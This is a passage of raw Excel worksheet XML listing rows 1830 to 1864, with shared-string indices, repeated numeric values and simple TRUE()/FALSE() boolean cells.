      </c>
      <c r="R1830" t="s">
        <v>5</v>
      </c>
      <c r="S1830" t="s">
        <v>1229</v>
      </c>
      <c r="T1830" t="s">
        <v>7</v>
      </c>
      <c r="U1830" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1831" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1831" s="1">
        <v>18199</v>
      </c>
      <c r="B1831" t="s">
        <v>0</v>
      </c>
      <c r="C1831" t="s">
        <v>1</v>
      </c>
      <c r="D1831" t="s">
        <v>2097</v>
      </c>
      <c r="E1831" t="s">
        <v>1227</v>
      </c>
      <c r="F1831">
        <v>29117300</v>
      </c>
      <c r="G1831" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1831" t="s">
        <v>2169</v>
      </c>
      <c r="K1831">
        <v>0</v>
      </c>
      <c r="L1831" t="s">
        <v>98</v>
      </c>
      <c r="R1831" t="s">
        <v>5</v>
      </c>
      <c r="S1831" t="s">
        <v>1229</v>
      </c>
      <c r="T1831" t="s">
        <v>7</v>
      </c>
      <c r="U1831" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1832" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1832" s="1">
        <v>18200</v>
      </c>
      <c r="B1832" t="s">
        <v>0</v>
      </c>
      <c r="C1832" t="s">
        <v>78</v>
      </c>
      <c r="D1832" t="s">
        <v>2097</v>
      </c>
      <c r="E1832" t="s">
        <v>1227</v>
      </c>
      <c r="F1832">
        <v>29117300</v>
      </c>
      <c r="G1832" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1832" t="s">
        <v>2170</v>
      </c>
      <c r="K1832">
        <v>0</v>
      </c>
      <c r="L1832" t="s">
        <v>98</v>
      </c>
      <c r="R1832" t="s">
        <v>5</v>
      </c>
      <c r="S1832" t="s">
        <v>1229</v>
      </c>
      <c r="T1832" t="s">
        <v>7</v>
      </c>
      <c r="U1832" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1833" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1833" s="1">
        <v>18201</v>
      </c>
      <c r="B1833" t="s">
        <v>0</v>
      </c>
      <c r="C1833" t="s">
        <v>78</v>
      </c>
      <c r="D1833" t="s">
        <v>2097</v>
      </c>
      <c r="E1833" t="s">
        <v>1227</v>
      </c>
      <c r="F1833">
        <v>29117300</v>
      </c>
      <c r="G1833" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1833" t="s">
        <v>2171</v>
      </c>
      <c r="K1833">
        <v>0</v>
      </c>
      <c r="L1833" t="s">
        <v>98</v>
      </c>
      <c r="R1833" t="s">
        <v>5</v>
      </c>
      <c r="S1833" t="s">
        <v>1229</v>
      </c>
      <c r="T1833" t="s">
        <v>7</v>
      </c>
      <c r="U1833" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1834" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1834" s="1">
        <v>18202</v>
      </c>
      <c r="B1834" t="s">
        <v>0</v>
      </c>
      <c r="C1834" t="s">
        <v>78</v>
      </c>
      <c r="D1834" t="s">
        <v>2097</v>
      </c>
      <c r="E1834" t="s">
        <v>1227</v>
      </c>
      <c r="F1834">
        <v>29117300</v>
      </c>
      <c r="G1834" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1834" t="s">
        <v>2172</v>
      </c>
      <c r="K1834">
        <v>0</v>
      </c>
      <c r="L1834" t="s">
        <v>98</v>
      </c>
      <c r="R1834" t="s">
        <v>5</v>
      </c>
      <c r="S1834" t="s">
        <v>1229</v>
      </c>
      <c r="T1834" t="s">
        <v>7</v>
      </c>
      <c r="U1834" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1835" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1835" s="1">
        <v>18203</v>
      </c>
      <c r="B1835" t="s">
        <v>0</v>
      </c>
      <c r="C1835" t="s">
        <v>78</v>
      </c>
      <c r="D1835" t="s">
        <v>2097</v>
      </c>
      <c r="E1835" t="s">
        <v>1227</v>
      </c>
      <c r="F1835">
        <v>29117300</v>
      </c>
      <c r="G1835" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1835" t="s">
        <v>2173</v>
      </c>
      <c r="K1835">
        <v>0</v>
      </c>
      <c r="L1835" t="s">
        <v>98</v>
      </c>
      <c r="R1835" t="s">
        <v>5</v>
      </c>
      <c r="S1835" t="s">
        <v>1229</v>
      </c>
      <c r="T1835" t="s">
        <v>7</v>
      </c>
      <c r="U1835" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1836" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1836" s="1">
        <v>18204</v>
      </c>
      <c r="B1836" t="s">
        <v>0</v>
      </c>
      <c r="C1836" t="s">
        <v>78</v>
      </c>
      <c r="D1836" t="s">
        <v>2097</v>
      </c>
      <c r="E1836" t="s">
        <v>1227</v>
      </c>
      <c r="F1836">
        <v>29117300</v>
      </c>
      <c r="G1836" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1836" t="s">
        <v>2174</v>
      </c>
      <c r="K1836">
        <v>0</v>
      </c>
      <c r="L1836" t="s">
        <v>98</v>
      </c>
      <c r="R1836" t="s">
        <v>5</v>
      </c>
      <c r="S1836" t="s">
        <v>1229</v>
      </c>
      <c r="T1836" t="s">
        <v>7</v>
      </c>
      <c r="U1836" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1837" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1837" s="1">
        <v>18205</v>
      </c>
      <c r="B1837" t="s">
        <v>0</v>
      </c>
      <c r="C1837" t="s">
        <v>78</v>
      </c>
      <c r="D1837" t="s">
        <v>2097</v>
      </c>
      <c r="E1837" t="s">
        <v>1227</v>
      </c>
      <c r="F1837">
        <v>29117300</v>
      </c>
      <c r="G1837" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1837" t="s">
        <v>2175</v>
      </c>
      <c r="K1837">
        <v>0</v>
      </c>
      <c r="L1837" t="s">
        <v>98</v>
      </c>
      <c r="R1837" t="s">
        <v>5</v>
      </c>
      <c r="S1837" t="s">
        <v>1229</v>
      </c>
      <c r="T1837" t="s">
        <v>7</v>
      </c>
      <c r="U1837" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1838" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1838" s="1">
        <v>18206</v>
      </c>
      <c r="B1838" t="s">
        <v>0</v>
      </c>
      <c r="C1838" t="s">
        <v>78</v>
      </c>
      <c r="D1838" t="s">
        <v>2097</v>
      </c>
      <c r="E1838" t="s">
        <v>1227</v>
      </c>
      <c r="F1838">
        <v>29117300</v>
      </c>
      <c r="G1838" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1838" t="s">
        <v>2176</v>
      </c>
      <c r="K1838">
        <v>0</v>
      </c>
      <c r="L1838" t="s">
        <v>98</v>
      </c>
      <c r="R1838" t="s">
        <v>5</v>
      </c>
      <c r="S1838" t="s">
        <v>1229</v>
      </c>
      <c r="T1838" t="s">
        <v>7</v>
      </c>
      <c r="U1838" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1839" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1839" s="1">
        <v>18207</v>
      </c>
      <c r="B1839" t="s">
        <v>0</v>
      </c>
      <c r="C1839" t="s">
        <v>78</v>
      </c>
      <c r="D1839" t="s">
        <v>2097</v>
      </c>
      <c r="E1839" t="s">
        <v>1227</v>
      </c>
      <c r="F1839">
        <v>29117300</v>
      </c>
      <c r="G1839" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1839" t="s">
        <v>2177</v>
      </c>
      <c r="K1839">
        <v>0</v>
      </c>
      <c r="L1839" t="s">
        <v>98</v>
      </c>
      <c r="R1839" t="s">
        <v>5</v>
      </c>
      <c r="S1839" t="s">
        <v>1229</v>
      </c>
      <c r="T1839" t="s">
        <v>7</v>
      </c>
      <c r="U1839" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1840" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1840" s="1">
        <v>18208</v>
      </c>
      <c r="B1840" t="s">
        <v>0</v>
      </c>
      <c r="C1840" t="s">
        <v>78</v>
      </c>
      <c r="D1840" t="s">
        <v>2097</v>
      </c>
      <c r="E1840" t="s">
        <v>1227</v>
      </c>
      <c r="F1840">
        <v>29117300</v>
      </c>
      <c r="G1840" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1840" t="s">
        <v>2178</v>
      </c>
      <c r="K1840">
        <v>0</v>
      </c>
      <c r="L1840" t="s">
        <v>98</v>
      </c>
      <c r="R1840" t="s">
        <v>5</v>
      </c>
      <c r="S1840" t="s">
        <v>1229</v>
      </c>
      <c r="T1840" t="s">
        <v>7</v>
      </c>
      <c r="U1840" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1841" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1841" s="1">
        <v>18209</v>
      </c>
      <c r="B1841" t="s">
        <v>0</v>
      </c>
      <c r="C1841" t="s">
        <v>78</v>
      </c>
      <c r="D1841" t="s">
        <v>2097</v>
      </c>
      <c r="E1841" t="s">
        <v>1227</v>
      </c>
      <c r="F1841">
        <v>29117300</v>
      </c>
      <c r="G1841" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1841" t="s">
        <v>2179</v>
      </c>
      <c r="K1841">
        <v>0</v>
      </c>
      <c r="L1841" t="s">
        <v>98</v>
      </c>
      <c r="R1841" t="s">
        <v>5</v>
      </c>
      <c r="S1841" t="s">
        <v>1229</v>
      </c>
      <c r="T1841" t="s">
        <v>7</v>
      </c>
      <c r="U1841" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1842" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1842" s="1">
        <v>18210</v>
      </c>
      <c r="B1842" t="s">
        <v>0</v>
      </c>
      <c r="C1842" t="s">
        <v>78</v>
      </c>
      <c r="D1842" t="s">
        <v>2097</v>
      </c>
      <c r="E1842" t="s">
        <v>1227</v>
      </c>
      <c r="F1842">
        <v>29117300</v>
      </c>
      <c r="G1842" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1842" t="s">
        <v>2180</v>
      </c>
      <c r="K1842">
        <v>0</v>
      </c>
      <c r="L1842" t="s">
        <v>98</v>
      </c>
      <c r="R1842" t="s">
        <v>5</v>
      </c>
      <c r="S1842" t="s">
        <v>1229</v>
      </c>
      <c r="T1842" t="s">
        <v>7</v>
      </c>
      <c r="U1842" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1843" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1843" s="1">
        <v>18211</v>
      </c>
      <c r="B1843" t="s">
        <v>0</v>
      </c>
      <c r="C1843" t="s">
        <v>78</v>
      </c>
      <c r="D1843" t="s">
        <v>2097</v>
      </c>
      <c r="E1843" t="s">
        <v>1227</v>
      </c>
      <c r="F1843">
        <v>29117300</v>
      </c>
      <c r="G1843" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1843" t="s">
        <v>2181</v>
      </c>
      <c r="K1843">
        <v>0</v>
      </c>
      <c r="L1843" t="s">
        <v>98</v>
      </c>
      <c r="R1843" t="s">
        <v>5</v>
      </c>
      <c r="S1843" t="s">
        <v>1229</v>
      </c>
      <c r="T1843" t="s">
        <v>7</v>
      </c>
      <c r="U1843" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1844" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1844" s="1">
        <v>18212</v>
      </c>
      <c r="B1844" t="s">
        <v>0</v>
      </c>
      <c r="C1844" t="s">
        <v>78</v>
      </c>
      <c r="D1844" t="s">
        <v>2097</v>
      </c>
      <c r="E1844" t="s">
        <v>1227</v>
      </c>
      <c r="F1844">
        <v>29117300</v>
      </c>
      <c r="G1844" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1844" t="s">
        <v>2182</v>
      </c>
      <c r="K1844">
        <v>0</v>
      </c>
      <c r="L1844" t="s">
        <v>98</v>
      </c>
      <c r="R1844" t="s">
        <v>5</v>
      </c>
      <c r="S1844" t="s">
        <v>1229</v>
      </c>
      <c r="T1844" t="s">
        <v>7</v>
      </c>
      <c r="U1844" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1845" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1845" s="1">
        <v>18213</v>
      </c>
      <c r="B1845" t="s">
        <v>0</v>
      </c>
      <c r="C1845" t="s">
        <v>78</v>
      </c>
      <c r="D1845" t="s">
        <v>2097</v>
      </c>
      <c r="E1845" t="s">
        <v>1227</v>
      </c>
      <c r="F1845">
        <v>29117300</v>
      </c>
      <c r="G1845" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1845" t="s">
        <v>2183</v>
      </c>
      <c r="K1845">
        <v>0</v>
      </c>
      <c r="L1845" t="s">
        <v>98</v>
      </c>
      <c r="R1845" t="s">
        <v>5</v>
      </c>
      <c r="S1845" t="s">
        <v>1229</v>
      </c>
      <c r="T1845" t="s">
        <v>7</v>
      </c>
      <c r="U1845" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1846" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1846" s="1">
        <v>18214</v>
      </c>
      <c r="B1846" t="s">
        <v>0</v>
      </c>
      <c r="C1846" t="s">
        <v>1</v>
      </c>
      <c r="D1846" t="s">
        <v>2097</v>
      </c>
      <c r="E1846" t="s">
        <v>1227</v>
      </c>
      <c r="F1846">
        <v>29117300</v>
      </c>
      <c r="G1846" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1846" t="s">
        <v>2184</v>
      </c>
      <c r="K1846">
        <v>0</v>
      </c>
      <c r="L1846" t="s">
        <v>98</v>
      </c>
      <c r="R1846" t="s">
        <v>5</v>
      </c>
      <c r="S1846" t="s">
        <v>1229</v>
      </c>
      <c r="T1846" t="s">
        <v>7</v>
      </c>
      <c r="U1846" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1847" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1847" s="1">
        <v>18215</v>
      </c>
      <c r="B1847" t="s">
        <v>0</v>
      </c>
      <c r="C1847" t="s">
        <v>78</v>
      </c>
      <c r="D1847" t="s">
        <v>2097</v>
      </c>
      <c r="E1847" t="s">
        <v>1227</v>
      </c>
      <c r="F1847">
        <v>29117300</v>
      </c>
      <c r="G1847" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1847" t="s">
        <v>2185</v>
      </c>
      <c r="K1847">
        <v>0</v>
      </c>
      <c r="L1847" t="s">
        <v>98</v>
      </c>
      <c r="R1847" t="s">
        <v>5</v>
      </c>
      <c r="S1847" t="s">
        <v>1229</v>
      </c>
      <c r="T1847" t="s">
        <v>7</v>
      </c>
      <c r="U1847" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1848" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1848" s="1">
        <v>18216</v>
      </c>
      <c r="B1848" t="s">
        <v>0</v>
      </c>
      <c r="C1848" t="s">
        <v>78</v>
      </c>
      <c r="D1848" t="s">
        <v>2097</v>
      </c>
      <c r="E1848" t="s">
        <v>1227</v>
      </c>
      <c r="F1848">
        <v>29117300</v>
      </c>
      <c r="G1848" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1848" t="s">
        <v>2186</v>
      </c>
      <c r="K1848">
        <v>0</v>
      </c>
      <c r="L1848" t="s">
        <v>98</v>
      </c>
      <c r="R1848" t="s">
        <v>5</v>
      </c>
      <c r="S1848" t="s">
        <v>1229</v>
      </c>
      <c r="T1848" t="s">
        <v>7</v>
      </c>
      <c r="U1848" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1849" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1849" s="1">
        <v>18217</v>
      </c>
      <c r="B1849" t="s">
        <v>0</v>
      </c>
      <c r="C1849" t="s">
        <v>78</v>
      </c>
      <c r="D1849" t="s">
        <v>2097</v>
      </c>
      <c r="E1849" t="s">
        <v>1227</v>
      </c>
      <c r="F1849">
        <v>29117300</v>
      </c>
      <c r="G1849" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1849" t="s">
        <v>2187</v>
      </c>
      <c r="K1849">
        <v>0</v>
      </c>
      <c r="L1849" t="s">
        <v>98</v>
      </c>
      <c r="R1849" t="s">
        <v>5</v>
      </c>
      <c r="S1849" t="s">
        <v>1229</v>
      </c>
      <c r="T1849" t="s">
        <v>7</v>
      </c>
      <c r="U1849" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1850" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1850" s="1">
        <v>18218</v>
      </c>
      <c r="B1850" t="s">
        <v>0</v>
      </c>
      <c r="C1850" t="s">
        <v>78</v>
      </c>
      <c r="D1850" t="s">
        <v>2097</v>
      </c>
      <c r="E1850" t="s">
        <v>1227</v>
      </c>
      <c r="F1850">
        <v>29117300</v>
      </c>
      <c r="G1850" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1850" t="s">
        <v>2188</v>
      </c>
      <c r="K1850">
        <v>0</v>
      </c>
      <c r="L1850" t="s">
        <v>98</v>
      </c>
      <c r="R1850" t="s">
        <v>5</v>
      </c>
      <c r="S1850" t="s">
        <v>1229</v>
      </c>
      <c r="T1850" t="s">
        <v>7</v>
      </c>
      <c r="U1850" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1851" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1851" s="1">
        <v>18219</v>
      </c>
      <c r="B1851" t="s">
        <v>0</v>
      </c>
      <c r="C1851" t="s">
        <v>78</v>
      </c>
      <c r="D1851" t="s">
        <v>2097</v>
      </c>
      <c r="E1851" t="s">
        <v>1227</v>
      </c>
      <c r="F1851">
        <v>29117300</v>
      </c>
      <c r="G1851" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1851" t="s">
        <v>2189</v>
      </c>
      <c r="K1851">
        <v>0</v>
      </c>
      <c r="L1851" t="s">
        <v>98</v>
      </c>
      <c r="R1851" t="s">
        <v>5</v>
      </c>
      <c r="S1851" t="s">
        <v>1229</v>
      </c>
      <c r="T1851" t="s">
        <v>7</v>
      </c>
      <c r="U1851" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1852" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1852" s="1">
        <v>18220</v>
      </c>
      <c r="B1852" t="s">
        <v>0</v>
      </c>
      <c r="C1852" t="s">
        <v>78</v>
      </c>
      <c r="D1852" t="s">
        <v>2097</v>
      </c>
      <c r="E1852" t="s">
        <v>1227</v>
      </c>
      <c r="F1852">
        <v>29117300</v>
      </c>
      <c r="G1852" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1852" t="s">
        <v>2190</v>
      </c>
      <c r="K1852">
        <v>0</v>
      </c>
      <c r="L1852" t="s">
        <v>98</v>
      </c>
      <c r="R1852" t="s">
        <v>5</v>
      </c>
      <c r="S1852" t="s">
        <v>1229</v>
      </c>
      <c r="T1852" t="s">
        <v>7</v>
      </c>
      <c r="U1852" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1853" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1853" s="1">
        <v>18221</v>
      </c>
      <c r="B1853" t="s">
        <v>0</v>
      </c>
      <c r="C1853" t="s">
        <v>78</v>
      </c>
      <c r="D1853" t="s">
        <v>2097</v>
      </c>
      <c r="E1853" t="s">
        <v>1227</v>
      </c>
      <c r="F1853">
        <v>29117300</v>
      </c>
      <c r="G1853" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1853" t="s">
        <v>2191</v>
      </c>
      <c r="K1853">
        <v>0</v>
      </c>
      <c r="L1853" t="s">
        <v>98</v>
      </c>
      <c r="R1853" t="s">
        <v>5</v>
      </c>
      <c r="S1853" t="s">
        <v>1229</v>
      </c>
      <c r="T1853" t="s">
        <v>7</v>
      </c>
      <c r="U1853" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1854" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1854" s="1">
        <v>18222</v>
      </c>
      <c r="B1854" t="s">
        <v>0</v>
      </c>
      <c r="C1854" t="s">
        <v>78</v>
      </c>
      <c r="D1854" t="s">
        <v>2097</v>
      </c>
      <c r="E1854" t="s">
        <v>1227</v>
      </c>
      <c r="F1854">
        <v>29117300</v>
      </c>
      <c r="G1854" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1854" t="s">
        <v>2192</v>
      </c>
      <c r="K1854">
        <v>0</v>
      </c>
      <c r="L1854" t="s">
        <v>98</v>
      </c>
      <c r="R1854" t="s">
        <v>5</v>
      </c>
      <c r="S1854" t="s">
        <v>1229</v>
      </c>
      <c r="T1854" t="s">
        <v>7</v>
      </c>
      <c r="U1854" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1855" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1855" s="1">
        <v>18223</v>
      </c>
      <c r="B1855" t="s">
        <v>0</v>
      </c>
      <c r="C1855" t="s">
        <v>78</v>
      </c>
      <c r="D1855" t="s">
        <v>2097</v>
      </c>
      <c r="E1855" t="s">
        <v>1227</v>
      </c>
      <c r="F1855">
        <v>29117300</v>
      </c>
      <c r="G1855" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1855" t="s">
        <v>2193</v>
      </c>
      <c r="K1855">
        <v>0</v>
      </c>
      <c r="L1855" t="s">
        <v>98</v>
      </c>
      <c r="R1855" t="s">
        <v>5</v>
      </c>
      <c r="S1855" t="s">
        <v>1229</v>
      </c>
      <c r="T1855" t="s">
        <v>7</v>
      </c>
      <c r="U1855" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1856" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1856" s="1">
        <v>18224</v>
      </c>
      <c r="B1856" t="s">
        <v>0</v>
      </c>
      <c r="C1856" t="s">
        <v>78</v>
      </c>
      <c r="D1856" t="s">
        <v>2097</v>
      </c>
      <c r="E1856" t="s">
        <v>1227</v>
      </c>
      <c r="F1856">
        <v>29117300</v>
      </c>
      <c r="G1856" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1856" t="s">
        <v>2194</v>
      </c>
      <c r="K1856">
        <v>0</v>
      </c>
      <c r="L1856" t="s">
        <v>98</v>
      </c>
      <c r="R1856" t="s">
        <v>5</v>
      </c>
      <c r="S1856" t="s">
        <v>1229</v>
      </c>
      <c r="T1856" t="s">
        <v>7</v>
      </c>
      <c r="U1856" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1857" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1857" s="1">
        <v>18225</v>
      </c>
      <c r="B1857" t="s">
        <v>0</v>
      </c>
      <c r="C1857" t="s">
        <v>78</v>
      </c>
      <c r="D1857" t="s">
        <v>2097</v>
      </c>
      <c r="E1857" t="s">
        <v>1227</v>
      </c>
      <c r="F1857">
        <v>29117300</v>
      </c>
      <c r="G1857" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1857" t="s">
        <v>2195</v>
      </c>
      <c r="K1857">
        <v>0</v>
      </c>
      <c r="L1857" t="s">
        <v>98</v>
      </c>
      <c r="R1857" t="s">
        <v>5</v>
      </c>
      <c r="S1857" t="s">
        <v>1229</v>
      </c>
      <c r="T1857" t="s">
        <v>7</v>
      </c>
      <c r="U1857" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1858" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1858" s="1">
        <v>18226</v>
      </c>
      <c r="B1858" t="s">
        <v>0</v>
      </c>
      <c r="C1858" t="s">
        <v>1</v>
      </c>
      <c r="D1858" t="s">
        <v>2097</v>
      </c>
      <c r="E1858" t="s">
        <v>1227</v>
      </c>
      <c r="F1858">
        <v>29117300</v>
      </c>
      <c r="G1858" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1858" t="s">
        <v>2196</v>
      </c>
      <c r="K1858">
        <v>0</v>
      </c>
      <c r="L1858" t="s">
        <v>98</v>
      </c>
      <c r="R1858" t="s">
        <v>5</v>
      </c>
      <c r="S1858" t="s">
        <v>1229</v>
      </c>
      <c r="T1858" t="s">
        <v>7</v>
      </c>
      <c r="U1858" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1859" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1859" s="1">
        <v>18227</v>
      </c>
      <c r="B1859" t="s">
        <v>0</v>
      </c>
      <c r="C1859" t="s">
        <v>78</v>
      </c>
      <c r="D1859" t="s">
        <v>1227</v>
      </c>
      <c r="E1859" t="s">
        <v>1227</v>
      </c>
      <c r="F1859">
        <v>0</v>
      </c>
      <c r="G1859" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J1859" t="s">
        <v>2197</v>
      </c>
      <c r="K1859">
        <v>0</v>
      </c>
      <c r="L1859" t="s">
        <v>98</v>
      </c>
      <c r="R1859" t="s">
        <v>5</v>
      </c>
      <c r="S1859" t="s">
        <v>1229</v>
      </c>
      <c r="T1859" t="s">
        <v>7</v>
      </c>
      <c r="U1859" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1860" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1860" s="1">
        <v>18228</v>
      </c>
      <c r="B1860" t="s">
        <v>0</v>
      </c>
      <c r="C1860" t="s">
        <v>78</v>
      </c>
      <c r="D1860" t="s">
        <v>2097</v>
      </c>
      <c r="E1860" t="s">
        <v>1227</v>
      </c>
      <c r="F1860">
        <v>29117300</v>
      </c>
      <c r="G1860" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1860" t="s">
        <v>2198</v>
      </c>
      <c r="K1860">
        <v>0</v>
      </c>
      <c r="L1860" t="s">
        <v>98</v>
      </c>
      <c r="R1860" t="s">
        <v>5</v>
      </c>
      <c r="S1860" t="s">
        <v>1229</v>
      </c>
      <c r="T1860" t="s">
        <v>7</v>
      </c>
      <c r="U1860" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1861" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1861" s="1">
        <v>18229</v>
      </c>
      <c r="B1861" t="s">
        <v>0</v>
      </c>
      <c r="C1861" t="s">
        <v>78</v>
      </c>
      <c r="D1861" t="s">
        <v>2097</v>
      </c>
      <c r="E1861" t="s">
        <v>1227</v>
      </c>
      <c r="F1861">
        <v>29117300</v>
      </c>
      <c r="G1861" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1861" t="s">
        <v>2199</v>
      </c>
      <c r="K1861">
        <v>0</v>
      </c>
      <c r="L1861" t="s">
        <v>98</v>
      </c>
      <c r="R1861" t="s">
        <v>5</v>
      </c>
      <c r="S1861" t="s">
        <v>1229</v>
      </c>
      <c r="T1861" t="s">
        <v>7</v>
      </c>
      <c r="U1861" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1862" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1862" s="1">
        <v>18230</v>
      </c>
      <c r="B1862" t="s">
        <v>0</v>
      </c>
      <c r="C1862" t="s">
        <v>1</v>
      </c>
      <c r="D1862" t="s">
        <v>2097</v>
      </c>
      <c r="E1862" t="s">
        <v>1227</v>
      </c>
      <c r="F1862">
        <v>29117300</v>
      </c>
      <c r="G1862" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1862" t="s">
        <v>2200</v>
      </c>
      <c r="K1862">
        <v>0</v>
      </c>
      <c r="L1862" t="s">
        <v>98</v>
      </c>
      <c r="R1862" t="s">
        <v>5</v>
      </c>
      <c r="S1862" t="s">
        <v>1229</v>
      </c>
      <c r="T1862" t="s">
        <v>7</v>
      </c>
      <c r="U1862" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1863" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1863" s="1">
        <v>18231</v>
      </c>
      <c r="B1863" t="s">
        <v>0</v>
      </c>
      <c r="C1863" t="s">
        <v>78</v>
      </c>
      <c r="D1863" t="s">
        <v>2097</v>
      </c>
      <c r="E1863" t="s">
        <v>1227</v>
      </c>
      <c r="F1863">
        <v>29117300</v>
      </c>
      <c r="G1863" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1863" t="s">
        <v>2201</v>
      </c>
      <c r="K1863">
        <v>0</v>
      </c>
      <c r="L1863" t="s">
        <v>98</v>
      </c>
      <c r="R1863" t="s">
        <v>5</v>
      </c>
      <c r="S1863" t="s">
        <v>1229</v>
      </c>
      <c r="T1863" t="s">
        <v>7</v>
      </c>
      <c r="U1863" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1864" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1864" s="1">
        <v>18232</v>
      </c>
      <c r="B1864" t="s">
        <v>0</v>
      </c>
      <c r="C1864" t="s">
        <v>78</v>
      </c>
      <c r="D1864" t="s">
        <v>2097</v>
      </c>
      <c r="E1864" t="s">
        <v>1227</v>
      </c>
      <c r="F1864">
        <v>29117300</v>
      </c>
      <c r="G1864" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1864" t="s">
        <v>2202</v>
      </c>
      <c r="K1864">
        <v>0</v>
      </c>
      <c r="L1864" t="s">
        <v>98</v>
      </c>
      <c r="R1864" t="s">
        <v>5</v>
      </c>
